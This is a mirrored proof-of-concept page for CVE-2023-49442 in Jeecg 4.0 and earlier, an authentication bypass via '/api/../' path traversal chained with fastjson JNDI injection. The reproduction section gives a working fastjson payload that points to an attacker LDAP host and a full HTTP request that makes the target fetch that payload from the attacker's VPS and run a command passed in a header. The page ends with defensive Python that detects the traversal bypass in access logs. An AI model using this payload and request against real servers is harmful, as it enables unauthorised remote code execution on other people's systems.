mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-06 19:38:09 +00:00
# Jeecg jeecgFormDemoController JNDI Code Execution Vulnerability CVE-2023-49442

## Vulnerability Description

In Jeecg 4.0 and earlier, the authentication check for the `/api` interface does not filter path traversal, so an attacker can craft a URL containing `../` to bypass authentication. The attacker can then send a malicious request to the `jeecgFormDemoController.do?interfaceTest` interface to perform JNDI injection and achieve remote code execution.

Jeecg (J2EE Code Generation) is an open-source code generation platform that is no longer maintained by its developers. Note: Jeecg and Jeecg-boot are not the same application.

References:

- https://xz.aliyun.com/t/13283

## Affected Versions

```
Jeecg <= 4.0
```

## Vulnerability Reproduction

The test environment uses fastjson version `1.2.31`; the vulnerable code is located at `src/main/java/com/jeecg/demo/controller/JeecgFormDemoController.java`.

Sending a request directly to the interface results in a 302 redirect, so a URL containing `../` must be constructed to bypass authentication. The `api` interface is not restricted, so the vulnerable URL is constructed as follows:

```
/api/../jeecgFormDemoController.do?interfaceTest=
```

JNDI injection tool: https://github.com/WhiteHSBG/JNDIExploit

Create a remote file poc.txt whose content is the fastjson code-execution payload:

```
{
    "a": {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://<your-vps-ip>:1389/Basic/TomcatEcho",
        "autoCommit": true
    }
}
```

Send the following request:

```
POST /jeecg/api/../jeecgFormDemoController.do?interfaceTest= HTTP/1.1
Host: 127.0.0.1:8081
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
cmd: whoami

serverUrl=http://<your-vps-ip>:8081/poc.txt&requestBody=123&requestMethod=GET
```
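The authentication bypass above comes down to an exemption decided on the raw URI before dot-segments are resolved. The following Python is an added example, not Jeecg's code or the PoC author's: it contrasts a hypothetical prefix-only exemption check with one that normalises the path first, and runs the same logic over constructed access-log lines to flag bypass attempts. It assumes the servlet context path (such as `/jeecg`) has already been stripped and that the exempt prefix is `/api/`.

```python
"""Added example: flawed vs. hardened '/api/' exemption check, plus log detection.
Assumption (not Jeecg's real code): the filter exempts any request whose raw URI
starts with API_PREFIX; the context path (e.g. '/jeecg') is already stripped."""
import posixpath
from urllib.parse import unquote, urlsplit

API_PREFIX = "/api/"


def normalize_path(raw_uri: str) -> str:
    """Percent-decode the path and resolve '.'/'..' segments as a container would."""
    path = unquote(urlsplit(raw_uri).path)
    norm = posixpath.normpath(path)  # collapses '..' and duplicate slashes
    if path.endswith("/") and not norm.endswith("/"):
        norm += "/"
    return norm


def vulnerable_is_exempt(raw_uri: str) -> bool:
    """Flawed check (hypothetical): prefix test on the raw, unnormalised URI."""
    return raw_uri.startswith(API_PREFIX)


def hardened_is_exempt(raw_uri: str) -> bool:
    """Fixed check: reject any dot-segment, then test the normalised path."""
    if ".." in unquote(urlsplit(raw_uri).path).split("/"):
        return False
    return normalize_path(raw_uri).startswith(API_PREFIX)


def is_bypass_attempt(raw_uri: str) -> bool:
    """True when the flawed check would exempt the request but the fixed one would not."""
    return vulnerable_is_exempt(raw_uri) and not hardened_is_exempt(raw_uri)


# Constructed sample access-log lines in combined format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [06/Nov/2025:10:00:01 +0000] "GET /api/user/list HTTP/1.1" 200 512
10.0.0.9 - - [06/Nov/2025:10:00:02 +0000] "POST /api/../jeecgFormDemoController.do?interfaceTest= HTTP/1.1" 200 88
10.0.0.9 - - [06/Nov/2025:10:00:03 +0000] "POST /api/%2e%2e/jeecgFormDemoController.do?interfaceTest= HTTP/1.1" 200 88
10.0.0.7 - - [06/Nov/2025:10:00:04 +0000] "GET /jeecgFormDemoController.do?interfaceTest= HTTP/1.1" 302 0
"""


def find_bypass_requests(log_text: str) -> list[str]:
    """Return the request URIs in the log that slip past the prefix check via traversal."""
    hits = []
    for line in log_text.splitlines():
        try:
            uri = line.split('"')[1].split(" ")[1]  # request field: 'METHOD /uri HTTP/1.1'
        except IndexError:
            continue
        if is_bypass_attempt(uri):
            hits.append(uri)
    return hits
```

Because the detection decodes before normalising, a percent-encoded `..` is caught as well as the literal form; the direct request that drew the 302 is not flagged, since it never claimed the exempt prefix.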